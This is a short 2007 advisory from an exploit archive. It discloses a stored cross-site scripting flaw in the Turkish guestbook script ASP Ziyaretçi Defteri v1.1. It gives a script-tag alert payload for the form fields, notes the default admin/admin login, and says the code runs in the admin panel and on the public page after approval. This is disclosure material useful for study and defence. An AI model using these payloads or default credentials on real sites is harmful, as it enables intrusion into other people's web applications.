Home / os / solaris

aspziy-xss.txt

Posted on 17 July 2007

ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability #Software: ASP Ziyaretçi Defteri v1.1 (tr) #download: http://www.aspindir.com/goster/4882 #demo: http://www.hiddenchest.com/kodlarim/ziyaret/ #Found By: GeFORC3 ( G3 ) #Exploit: 1-http://www.example.com/ziyaret/mesaj_formu.asp Isim: <script>alert("G3");</script> E-posta: <script>alert("G3");</script> Mesajiniz: <script>alert("G3");</script> Press to "Gönder"(send) button. 2- Yönetici paneli (admin panel): http://www.example.com/ziyaret/default.asp (default user:admin pass:admin) press "gir" button. http://www.example.com/default.asp?islem=login --> running xss code This xss works on ASP Ziyaretçi Defteri v1.1 (tr) script's Yönetici Paneli (admin panel) if eðer admin mesajý onaylarsa (active ederse) xss code çalýþýr guestbook's main page (ziyaretçi defterinin ana sayfasýnda) if admin checked your message (xss code) xss code running ASP Ziyaretçi Defteri v1.1's (guestbook's) main page ( http://example.com/ziyaret/ziyaretci_mesajlari.asp) WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com

 

TOP